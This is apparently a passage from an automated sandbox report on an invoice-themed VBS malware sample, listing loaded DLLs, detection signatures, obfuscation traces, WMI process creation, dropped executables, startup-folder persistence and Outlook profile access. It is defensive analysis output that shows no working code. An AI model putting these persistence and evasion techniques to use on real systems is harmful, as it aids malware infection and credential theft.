Source: C:\Windows\System32\wscript.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: workfoldersshell.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: shacct.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: idstore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: samlib.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: starttiledata.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wlidprov.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: usermgrcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: provsvc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: usermgrproxy.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: acppage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: aepic.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: atl.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: msisip.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: wshext.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: appxsip.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: opcservices.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: windowscodecs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: napinsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wshbth.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: nlaapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winrnr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: Fattura-24SC-99245969925904728562.vbs Static file information: File size 2500641 > 1048576
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1423198807.000000000A040000.00000004.08000000.00040000.00000000.sdmp, Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000005437000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1547078793.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000006386000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1567720148.00000000061E6000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1423198807.000000000A040000.00000004.08000000.00040000.00000000.sdmp, Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000005437000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1547078793.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000006386000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1567720148.00000000061E6000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: powershell.pdbUGP source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000000.1312087444.00000000003D1000.00000020.00000001.01000000.00000005.sdmp, OSDescription.vbs.exe, 0000000F.00000000.1514068078.0000000000348000.00000020.00000001.01000000.0000000C.sdmp, OSDescription.vbs.exe.13.dr, Fattura-24SC-99245969925904728562.vbs.exe.4.dr
Source: Binary string: protobuf-net.pdbSHA256}Lq source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: powershell.pdb source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000000.1312087444.00000000003D1000.00000020.00000001.01000000.00000005.sdmp, OSDescription.vbs.exe, 0000000F.00000000.1514068078.0000000000348000.00000020.00000001.01000000.0000000C.sdmp, OSDescription.vbs.exe.13.dr, Fattura-24SC-99245969925904728562.vbs.exe.4.dr
Source: Binary string: protobuf-net.pdb source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.8400000.2.raw.unpack, MerchantContainerStrategy.cs .Net Code: SearchFilter System.Reflection.Assembly.Load(byte[])
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.8910000.4.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.8910000.4.raw.unpack, ListDecorator.cs .Net Code: Read
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.8910000.4.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.8910000.4.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.8910000.4.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
Yara detected Costura Assembly Loader
Source: Yara match File source: 9.2.InstallUtil.exe.23e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.9f60000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.1422431718.0000000009F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.1617686351.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.1547078793.0000000004BC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1452882158.0000000002521000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1377378668.0000000005095000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1452651093.00000000023E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Fattura-24SC-99245969925904728562.vbs.exe PID: 7764, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 7928, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: OSDescription.vbs.exe PID: 6024, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 2980, type: MEMORYSTR
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Code function: 7_2_0A0306A0 push ebx; retf 7_2_0A0306A3
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Code function: 7_2_0A03BD0A push B9FFFFFFh; ret 7_2_0A03BD14
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Code function: 7_2_0A03E584 push F0B9046Ah; ret 7_2_0A03E58A
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Code function: 7_2_0A345319 push B9FFFFE5h; ret 7_2_0A34531E
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Code function: 7_2_0A34245C push B9FFFFE4h; ret 7_2_0A342472
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Code function: 7_2_0A3438E2 push B9FFFFF9h; ret 7_2_0A3438E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_00A521E1 push 8BD88B00h; retf 9_2_00A521E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_023DEE10 push edi; ret 9_2_023DEE16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C335FF push ds; ret 9_2_04C3363A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C33547 push es; ret 9_2_04C3354A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C3354B push ss; ret 9_2_04C33562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C33563 push ds; ret 9_2_04C335A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C33687 push es; ret 9_2_04C33692
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C337CB push ds; ret 9_2_04C337DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C337F3 push es; ret 9_2_04C337F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C337F7 push cs; ret 9_2_04C337FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C33797 push ds; ret 9_2_04C3379A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C337A7 push ss; ret 9_2_04C337AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C33707 push es; ret 9_2_04C3370A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C3371B push ss; ret 9_2_04C33726
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C33727 push cs; ret 9_2_04C3372A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C31897 push BE000000h; retn 0000h 9_2_04C3189C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C3389B push ds; ret 9_2_04C338A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C338A7 push es; ret 9_2_04C338AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C338AB push cs; ret 9_2_04C338B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C33807 push cs; ret 9_2_04C3380A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C339EF push ss; ret 9_2_04C339F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C33983 push cs; ret 9_2_04C33986
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C33987 push ds; ret 9_2_04C3398A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C33997 push cs; ret 9_2_04C3399E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C3399F push es; ret 9_2_04C339B6

Persistence and Installation Behavior
barindex
Creates processes via WMI
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\cmd.exe File created: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Jump to dropped file
Source: C:\Windows\System32\cmd.exe File created: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log Jump to behavior

Boot Survival
barindex
Drops VBS files to the startup folder
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OSDescription.vbs Jump to dropped file
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OSDescription.vbs Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OSDescription.vbs Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
